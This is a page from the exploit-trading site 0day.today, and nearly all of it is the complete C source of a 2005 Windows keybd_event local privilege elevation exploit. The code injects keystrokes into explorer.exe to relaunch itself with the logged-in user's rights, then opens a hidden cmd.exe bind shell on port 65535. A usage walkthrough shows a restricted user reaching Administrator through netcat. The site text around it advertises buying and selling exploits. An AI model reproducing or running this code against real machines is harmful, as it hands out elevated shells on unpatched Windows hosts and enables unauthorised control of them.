0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Windows (keybd_event) Local Privilege Elevation Exploit
========================================================== MS Windows (keybd_event) Local Privilege Elevation Exploit ========================================================== /* * Microsoft Windows keybd_event validation vulnerability. * Local privilege elevation * * Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com ) * I?aki Lopez ( ilo _@_ reversing.org ) * * Platforms afected/tested: * * - Windows 2000 * - Windows XP * - Windows 2003 * * * Original Advisory: http://www.haxorcitos.com * http://www.reversing.org * * Exploit Date: 08 / 06 / 2005 * * Orignal Advisory: * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * * Attack Scenario: * * a) An attacker who gains access to an unprivileged shell/application executed * with the application runas. * b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP * * Impact: * * Due to an invalid keyboard input validation, its possible to send keys to any * application of the Desktop. * By sending some short-cut keys its possible to execute code and elevate privileges * getting loggued user privileges and bypass runas/service security restriction. * * Exploit usage: * * C:\>whoami * AQUARIUS\Administrador * * C:\>runas /user:restricted cmd.exe * Escribir contrase?a para restricted: * Intentando iniciar "cmd.exe" como usuario "AQUARIUS\restricted"... * * * Microsoft Windows 2000 [Versi?n 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\WINNT\system32>cd \ * * C:\>whoami * AQUARIUS\restricted * * C:\>tlist.exe |find "explorer.exe" * 1140 explorer.exe Program Manager * * C:\>c:\keybd.exe 1140 * HANDLE Found. Attacking =) * * C:\>nc localhost 65535 * Microsoft Windows 2000 [Versi?n 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\>whoami * whoami * AQUARIUS\Administrador * * * DONE =) * */ #include <stdio.h> #include <string.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") #define HAXORCITOS 65535 unsigned int pid = 0; char buf[256]=""; /**************************************************************/ void ExplorerExecution (HWND hwnd, LPARAM lParam){ DWORD hwndid; int i; GetWindowThreadProcessId(hwnd,&hwndid); if (hwndid == pid){ /* Replace keybd_event with SendMessage() and PostMessage() calls */ printf("HANDLE Found. Attacking =)\n"); SetForegroundWindow(hwnd); keybd_event(VK_LWIN,1,0,0); keybd_event(VkKeyScan('r'),1,0,0); keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0); keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0); for(i=0;i<strlen(buf);i++) { if (buf[i]==':') { keybd_event(VK_SHIFT,1,0,0); keybd_event(VkKeyScan(buf[i]),1,0,0); keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0); keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0); } else { if (buf[i]=='\\') { keybd_event(VK_LMENU,1,0,0); keybd_event(VK_CONTROL,1,0,0); keybd_event(VkKeyScan('?'),1,0,0); keybd_event(VK_LMENU,1,KEYEVENTF_KEYUP,0); keybd_event(VK_CONTROL,1,KEYEVENTF_KEYUP,0); keybd_event(VkKeyScan('?'),1,KEYEVENTF_KEYUP,0); } else { keybd_event(VkKeyScan(buf[i]),1,0,0); keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0); } } } keybd_event(VK_RETURN,1,0,0); keybd_event(VK_RETURN,1,KEYEVENTF_KEYUP,0); exit(1); } } /**************************************************************/ int BindShell(void) { //Bind Shell. POrt 65535 SOCKET s,s2; STARTUPINFO si; PROCESS_INFORMATION pi; WSADATA HWSAdata; struct sockaddr_in sa; int len; if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { exit(1); } if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){ exit(1); } sa.sin_family = AF_INET; sa.sin_port = (USHORT)htons(HAXORCITOS); sa.sin_addr.s_addr = htonl(INADDR_ANY); len=sizeof(sa); if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) { return(-1); } if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); } s2 = accept(s,(struct sockaddr *)&sa,&len); closesocket(s); ZeroMemory( &si, sizeof(si) ); ZeroMemory( &pi, sizeof(pi) ); si.cb = sizeof(si); si.wShowWindow = SW_HIDE; si.dwFlags =STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; si.hStdInput = (void *) s2; // SOCKET si.hStdOutput = (void *) s2; si.hStdError = (void *) s2; if (!CreateProcess( NULL ,"cmd.exe",NULL, NULL,TRUE, 0,NULL,NULL,&si,&pi)) { doFormatMessage(GetLastError()); return(-1); } WaitForSingleObject( pi.hProcess, INFINITE ); closesocket(s); closesocket(s2); printf("SALIMOS...\n"); Sleep(5000); return(1); } /**************************************************************/ void main(int argc, char* argv[]) { HWND console_wnd = NULL; if (argc >= 2) { pid = atoi (argv[1]); strncpy(buf,argv[0],sizeof(buf)-1); EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&console_wnd)); } else { BindShell(); } } /**************************************************************/ # 0day.today [2024-12-24] #